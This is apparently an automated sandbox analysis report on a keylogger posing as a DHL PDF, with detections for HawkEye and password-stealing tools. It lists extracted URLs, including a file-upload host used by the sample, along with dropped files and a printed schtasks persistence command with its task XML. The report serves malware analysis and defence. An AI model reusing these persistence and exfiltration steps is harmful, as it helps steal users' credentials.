            https://widgets.outbrain.com/widgetOBUserSync/obUserSync.html | bhvE48A.tmp.11.dr | false | | high
            http://pomf.cat/upload.php | DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            https://www.google.com/chrome/static/js/installer.min.js | bhvE48A.tmp.11.dr | false | | high
            https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png | bhvE48A.tmp.11.dr | false | | high
            https://cvision.media.net/new/300x194/2/100/237/97/93b3dc40-172c-479f-bf5a-5d49e8538bf9.jpg?v=9 | bhvE48A.tmp.11.dr | false | | high
            https://widgets.outbrain.com/widgetOBUserSync/obUserSync.htmlhttp://s.amazon-adsystem.com/x/da2e6c89 | vbc.exe, 0000000B.00000003.300248743.00000000021AB000.00000004.00000001.sdmp | false | | high
            http://bot.whatismyipaddress.com/ | DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp | false | | high
            https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au | bhvE48A.tmp.11.dr | false | URL Reputation: safe | unknown
            https://www.google.com/chrome/static/images/homepage/google-beta.png | bhvE48A.tmp.11.dr | false | | high
            http://www.msn.com/de-ch/?ocid=iehp | bhvE48A.tmp.11.dr | false | | high
            https://www.google.com/chrome/static/images/icon-file-download.svg | bhvE48A.tmp.11.dr | false | | high
            http://www.fontbureau.com/designers/cabarga.htmlN | DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmp | false | | high
            https://cvision.media.net/new/286x175/2/89/162/29/8ee7a9a3-dec9-4d15-94e1-5c73b17d2de1.jpg?v=9 | bhvE48A.tmp.11.dr | false | | high
                                                                                                                                      http://www.founder.com.cn/cnDHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      https://www.googletagservices.com/activeview/js/current/osd.js?cb=%2Fr20100101bhvE48A.tmp.11.drfalse
                                                                                                                                        high
                                                                                                                                        http://acdn.adnxs.com/dmp/async_usersync.htmlbhvE48A.tmp.11.drfalse
                                                                                                                                          high
                                                                                                                                          https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1bhvE48A.tmp.11.drfalse
                                                                                                                                            high
                                                                                                                                            https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47bhvE48A.tmp.11.drfalse
                                                                                                                                              high
                                                                                                                                              http://cookies.onetrust.mgr.consensu.org/onetrust-logo.svgbhvE48A.tmp.11.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              http://sb.scorecardresearch.com/beacon.jsbhvE48A.tmp.11.drfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gtbhvE48A.tmp.11.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1res://C:vbc.exe, 0000000B.00000003.299521539.00000000027CA000.00000004.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://ib.adnxs.com/async_usersync_filevbc.exe, 0000000B.00000003.299060394.00000000021B4000.00000004.00000001.sdmp, bhvE48A.tmp.11.drfalse
                                                                                                                                                  high
                                                                                                                                                  http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplatebhvE48A.tmp.11.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://www.google.com/chrome/static/images/folder-applications.svgbhvE48A.tmp.11.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211bhvE48A.tmp.11.drfalse
                                                                                                                                                        high
                                                                                                                                                        http://b1t-use2.zemanta.com/t/imp/impression/FZV2QWU7KWGCXF6REQZNFCRJIZ4GXAXBRWOOIKPCGXHSIEOKHUJBTWLbhvE48A.tmp.11.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpgbhvE48A.tmp.11.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://www.google.com/chrome/static/images/chrome-logo.svgbhvE48A.tmp.11.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://www.google.com/chrome/static/images/homepage/homepage_features.pngbhvE48A.tmp.11.drfalse
                                                                                                                                                                high
                                                                                                                                                                http://www.collada.org/2005/11/COLLADASchema9DoneDHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.285852957.0000000003419000.00000004.00000001.sdmpfalse
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                unknown
                                                                                                                                                                http://www.sajatypeworks.comDHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpfalse
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                unknown

Contacted IPs

[Map legend: No. of IPs < 25%; 25% < No. of IPs < 50%; 50% < No. of IPs < 75%; 75% < No. of IPs]

Public

IP | Domain | Country | Flag | ASN | ASN Name | Malicious

Private

IP
192.168.2.1

General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 502165
Start date: 13.10.2021
Start time: 17:07:49
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 40s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: DHL_AWB 518877882999_887755468_pdf.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 29
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.phis.troj.spyw.evad.winEXE@10/7@0/1
EGA Information: Failed
HDC Information:
• Successful, ratio: 7.6% (good quality ratio 6.4%)
• Quality average: 72.5%
• Quality standard deviation: 35.8%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 158
• Number of non-executed functions: 294
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 20.50.102.62, 131.253.33.200, 13.107.22.200, 95.100.218.79, 95.100.216.89, 20.82.210.154, 2.20.178.56, 2.20.178.10, 20.54.110.249, 40.112.88.60, 2.20.178.24, 2.20.178.33
• Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.useroor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time | Type | Description
17:08:56 | API Interceptor | 3x Sleep call for process: DHL_AWB 518877882999_887755468_pdf.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL_AWB 518877882999_887755468_pdf.exe.log
Process: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 1216
Entropy (8bit): 5.355304211458859
Encrypted: false
SSDEEP: 24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5: FED34146BF2F2FA59DCF8702FCC8232E
SHA1: B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256: 123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512: 1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious: true
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Local\Temp\2e8f43fa-ffff-b936-99ba-10ff8c640f0d
Process: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 108
Entropy (8bit): 5.483051887012622
Encrypted: false
SSDEEP: 3:/o3Q2QffK1zJcNXCcBpVIYmmrfwEkzfuB4n:/yjQfi1uN/cmsVz2B4
MD5: F011D936EB499ED9028D1DF4162D136F
SHA1: 0CC320DB0A1ADE3C5A4278C09259772C879B7B57
SHA-256: 2D6375D75D48604E8AA5C9D9064C82D93457340244E1D62BDF1C73A34EEA941D
SHA-512: FE5ACE131B3DE321C6B8CCFA47CC31BC809D421C44F9AB4A0383BA5515DC38A858D87579605264C82E4890626B3E5E92B3D7E0AA73889A41E37D93DF13CBA384
Malicious: false
Reputation: low
Preview: vMSR5XyDGaw1S/nFeKjG9z/ZXgLmXlt/JGB9hvSuvggzH9mecNyELmNW3haEhSc8aHNinZpbl/Y5zC3qc6wI9aD3dF0Mi2J9szSa7WRm4cg=

C:\Users\user\AppData\Local\Temp\bhvE48A.tmp
                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb0d9183e, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):26738688
                                                                                                                                                                Entropy (8bit):1.0399297131617353
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:mcqhtSFKmLncRDPf6r0i1cREikolT3YEgI:6sLncx6r4
                                                                                                                                                                MD5:667F3E0A8064B46D23483A3AB5336CA2
                                                                                                                                                                SHA1:4D98A6C8A7FCD6D0D06697A19260C42ED749E782
                                                                                                                                                                SHA-256:47D0B6AE151AFDFE0352F84ECEB9FA18E0978C265A408B70E4CEE9B87091465B
                                                                                                                                                                SHA-512:3BE3AC56C84550648AEE973DB0EF4A1347A39C3DA8B6656B5977BC1E1A1224CACC22D8E785E50DCC23DA1947154CF0B732251E1F8862D89DDC7E27E0B24A17B0
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmp1B0D.tmp
                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                                                                                                Category:modified
                                                                                                                                                                Size (bytes):2
                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Qn:Qn
                                                                                                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: ..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmp70BF.tmp
                                                                                                                                                                Process:C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe
                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1656
                                                                                                                                                                Entropy (8bit):5.171528568960239
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:2dH4+SEqC/dp7hdMlNMFpdU/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBntn:cbhH7MlNQ8/rydbz9I3YODOLNdq3L
                                                                                                                                                                MD5:AD951DCF7ECF37B0A4AA857B0D7403AE
                                                                                                                                                                SHA1:1C1E2C51F466443132BF5A6CE55EDEB1116DBCFB
                                                                                                                                                                SHA-256:1B58ED120BD7682F12CD22BC580B62BC0E3020DFBDE0444A68B654E93248DFEE
                                                                                                                                                                SHA-512:C4C2F68B0A1D5571B57A777D369BB9DDF3A4B36B686A4E04BC2BF464887A8E196A695B5D6ABFF0AFACCB3A89E3C6C16D793A9DCAB6227240FE9BF04F63F53D7B
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAv
                                                                                                                                                                C:\Users\user\AppData\Roaming\cmsyNzu.exe
                                                                                                                                                                Process:C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1078272
                                                                                                                                                                Entropy (8bit):7.772035339679424
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:+yEc0kMMFANUc0FBcm6YAVjfsxogLMkB:1Ec0LWI+EJ3jYo3kB
                                                                                                                                                                MD5:7D11E82579E2A0628CA3C855AFE34FD1
                                                                                                                                                                SHA1:D6ABBBE7F991E79C3BC51480314386C0CCE5F2B9
                                                                                                                                                                SHA-256:691CB999C6BE0F430C14A9411ABF6796F174C8D8F3C3EDC4B819B3B35972D832
                                                                                                                                                                SHA-512:1939E68DAE222D5F7E4391C041EBEA87194E5BE8A9CEC6BC3BA83D1DC2242377ECE4E63BF8893CF9524C5933E2A6C9B3AE880DC5C0FE57B0125D0A09FAEADAE0
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                C:\Users\user\AppData\Roaming\cmsyNzu.exe:Zone.Identifier
                                                                                                                                                                Process:C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe
                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):26
                                                                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview: [ZoneTransfer]....ZoneId=0

                                                                                                                                                                Static File Info

                                                                                                                                                                General

                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                Entropy (8bit):7.772035339679424
                                                                                                                                                                TrID:
                                                                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                File name:DHL_AWB 518877882999_887755468_pdf.exe
                                                                                                                                                                File size:1078272
                                                                                                                                                                MD5:7d11e82579e2a0628ca3c855afe34fd1
                                                                                                                                                                SHA1:d6abbbe7f991e79c3bc51480314386c0cce5f2b9
                                                                                                                                                                SHA256:691cb999c6be0f430c14a9411abf6796f174c8d8f3c3edc4b819b3b35972d832
                                                                                                                                                                SHA512:1939e68dae222d5f7e4391c041ebea87194e5be8a9cec6bc3ba83d1dc2242377ece4e63bf8893cf9524c5933e2a6c9b3ae880dc5c0fe57b0125d0a09faeadae0
                                                                                                                                                                SSDEEP:24576:+yEc0kMMFANUc0FBcm6YAVjfsxogLMkB:1Ec0LWI+EJ3jYo3kB
                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....fa..............0..h............... ........@.. ....................................@................................

                                                                                                                                                                File Icon

                                                                                                                                                                Icon Hash:00828e8e8686b000

                                                                                                                                                                Static PE Info

                                                                                                                                                                General

                                                                                                                                                                Entrypoint:0x5086ee
                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                Digitally signed:false
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                                Time Stamp:0x61667FF1 [Wed Oct 13 06:42:57 2021 UTC]
                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                CLR (.Net) Version:v4.0.30319
                                                                                                                                                                OS Version Major:4
                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                File Version Major:4
                                                                                                                                                                File Version Minor:0
                                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                Instruction
                                                                                                                                                                jmp dword ptr [00402000h]
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x108694 | 0x57 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x10a000 | 0x618 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x10c000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | 

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x1066f4 | 0x106800 | False | 0.874490327381 | data | 7.77724876545 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0x10a000 | 0x618 | 0x800 | False | 0.33935546875 | data | 3.47597490494 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x10c000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_VERSION | 0x10a0a0 | 0x388 | data |  | 
RT_MANIFEST | 0x10a428 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators |  | 

Imports

DLL | Import
mscoree.dll | _CorExeMain

Version Infos

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright 2015
Assembly Version | 2.0.1.0
InternalName | KeyedHashAlgorit.exe
FileVersion | 2.0.1.0
CompanyName | reblGreen Software Ltd
LegalTrademarks | 
Comments | 
ProductName | DimWin Brightness
ProductVersion | 2.0.1.0
FileDescription | DimWin Brightness
OriginalFilename | KeyedHashAlgorit.exe

Network Behavior

No network behavior found

System Behavior

General

Start time: 17:08:48
Start date: 13/10/2021
Path: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe'
Imagebase: 0xf40000
File size: 1078272 bytes
MD5 hash: 7D11E82579E2A0628CA3C855AFE34FD1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000000.00000002.290657795.000000000536D000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.290657795.000000000536D000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.285852957.0000000003419000.00000004.00000001.sdmp, Author: Joe Security
• Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000000.00000002.289479199.0000000004E84000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.289479199.0000000004E84000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 17:09:01
Start date: 13/10/2021
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\cmsyNzu' /XML 'C:\Users\user\AppData\Local\Temp\tmp70BF.tmp'
Imagebase: 0xa30000
File size: 185856 bytes
MD5 hash: 15FF7D8324231381BAD48A052F85DF04
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 17:09:01
Start date: 13/10/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff774ee0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                General

                                                                                                                                                                Start time:17:09:01
                                                                                                                                                                Start date:13/10/2021
                                                                                                                                                                Path:C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe
                                                                                                                                                                Imagebase:0xe60000
                                                                                                                                                                File size:1078272 bytes
                                                                                                                                                                MD5 hash:7D11E82579E2A0628CA3C855AFE34FD1
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000007.00000002.525571222.000000000330E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 00000007.00000002.528296707.0000000007D90000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000007.00000002.528296707.0000000007D90000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000007.00000002.528296707.0000000007D90000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000007.00000002.526864554.00000000041F5000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000007.00000002.526864554.00000000041F5000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000007.00000002.517940589.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
